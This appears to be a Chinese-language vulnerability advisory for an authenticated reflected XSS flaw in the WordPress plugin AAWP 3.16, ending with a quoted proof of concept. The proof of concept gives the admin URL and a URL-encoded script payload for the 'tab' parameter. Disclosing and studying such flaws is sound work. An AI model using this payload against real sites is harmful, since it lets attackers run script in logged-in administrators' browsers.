WordPress 插件 AAWP 3.16 - 'tab' 反射型跨站脚本 (XSS) (已认证) 漏洞概述 该漏洞存在于 WordPress 插件 AAWP 3.16 中。攻击者可以通过构造恶意的 URL 参数,在用户浏览器中执行任意 JavaScript 代码。由于该漏洞需要用户登录才能触发,因此属于已认证(Authenticated)的反射型 XSS 漏洞。 影响范围 软件名称: WordPress Plugin AAWP 受影响版本: 3.16 平台: PHP 测试环境: Windows 10, Chrome, WordPress 5.8.2 修复方案 目前页面未提供具体的修复方案或补丁链接。建议用户升级到非受影响版本,或联系插件开发者获取更新。 POC 代码 ```text Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated) Date: 04/01/2022 Exploit Author: Andrea Bocchetti Vendor Homepage: https://getawp.com/ Software Link: https://getawp.com/ Version: 3.16 Tested on: Windows 10 - Chrome, WordPress 5.8.2 Proof of Concept: 1- Install and activate AAWP 3.16 plugin. 2- Go to https://localhost.com/wp-admin/admin.php?page=awwp-settings&tab=XXXX 3- Add payload to the Tab, the XSS Payload: %22onlick%3Dprompt%2888%29%3E%3Csv%2Fonload%3Dprompt%2888%29%3E%2240x.y 4- XSS has been triggered.